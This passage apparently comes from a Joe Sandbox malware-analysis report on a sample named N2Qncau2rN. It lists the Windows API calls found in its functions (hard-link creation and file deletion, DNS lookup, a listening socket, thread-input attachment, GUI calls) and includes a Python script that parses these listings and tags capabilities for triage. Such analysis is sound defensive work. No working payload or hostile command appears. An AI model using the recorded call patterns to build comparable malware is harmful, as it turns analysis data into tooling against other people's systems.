                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2782032738-0
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
• __isleadbyte_l.LIBCMT ref: 004208A6
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1795658109-0
                                                                                                                                                                                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00449519
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00449526
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886238975-0
                                                                                                                                                                                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1792727568-0
                                                                                                                                                                                                                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
• lstrlenW.KERNEL32(?), ref: 00434CF6
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
• lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen$_malloc
• String ID: cdecl
• API String ID: 3850814276-3896280584
• Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
• Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
• Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
• Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
• Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
• Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
• Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
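The per-function API listings above are emitted by the Joe Sandbox IDA plugin in a fixed text layout (an "APIs" header, one bullet per call with its call-site address, then a "Similarity" block whose "API String ID" is the report's own similarity key). To hunt across many such records it helps to parse them into structured calls. The Python below is an added example, not Joe Sandbox code: it parses three records copied from this page, tags each function with a hypothetical capability label (the tag table and its names are this example's own assumption), and resolves the recovered uMsg values of the SendMessageW calls to their Windows SDK names (WM_SETFONT, EM_GETSEL, EM_LINEFROMCHAR, LVM_SETITEMW, LVM_SETITEMSTATE). The API String ID is carried over verbatim; the example does not recompute it.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three complete "APIs" records copied from this page, with
# the leading whitespace and the "Memory Dump Source" lines removed.
SAMPLE = """\
APIs
• Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Similarity
• API String ID: 2502553879-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Similarity
• API String ID: 385091864-0
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Similarity
• API String ID: 312131281-0
"""

# One "<api>.<module>(<args>), ref: <addr>" bullet. The argument list is optional
# ("_memmove.LIBCMT ref: ..." has none) and "?" marks values the sandbox could not recover.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: Optional[list]    # None when the listing shows no argument list
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when marked "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_string_id: Optional[str] = None   # taken verbatim from the report

def parse_records(text: str) -> list:
    """Split the listing on 'APIs' headers and parse each record's bullets."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = None if m.group("args") is None else m.group("args").split(",")
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                         m.group("ref").upper(), m.group("sub")))
        elif line.startswith("• API String ID:"):
            current.api_string_id = line.split(":", 1)[1].strip()
    return records

# Hypothetical capability tags used for triage in this example only.
CAPABILITY_TAGS = {
    "gethostbyname": "dns-resolve", "getaddrinfo": "dns-resolve",
    "select": "socket-server", "accept": "socket-server", "listen": "socket-server",
    "connect": "socket-client", "send": "socket-client", "recv": "socket-client",
    "SendMessageW": "gui", "CreateWindowExW": "gui", "ShowWindow": "gui",
}

# Windows SDK message numbers for the SendMessageW calls seen on this page.
WINDOW_MESSAGES = {0x0030: "WM_SETFONT", 0x00B0: "EM_GETSEL", 0x00C9: "EM_LINEFROMCHAR",
                   0x102B: "LVM_SETITEMSTATE", 0x104C: "LVM_SETITEMW"}

def capabilities(record: FunctionRecord) -> set:
    return {CAPABILITY_TAGS[c.api] for c in record.calls if c.api in CAPABILITY_TAGS}

def decode_messages(record: FunctionRecord) -> list:
    """(call-site, message name) for every SendMessageW whose uMsg was recovered."""
    out = []
    for c in record.calls:
        if c.api in ("SendMessageW", "SendMessageA") and c.args and len(c.args) >= 2:
            try:
                msg = int(c.args[1], 16)
            except ValueError:   # uMsg shown as "?"
                continue
            out.append((c.ref, WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_string_id, sorted(capabilities(rec)), decode_messages(rec))
```

Run against the sample, the first record is tagged dns-resolve (gethostbyname), the second socket-server (select/accept), and the third resolves its two recovered messages to LVM_SETITEMW and LVM_SETITEMSTATE; the SendMessageW at 00448C69, whose arguments the report does not show, is skipped rather than guessed.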
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Memory Dump Source
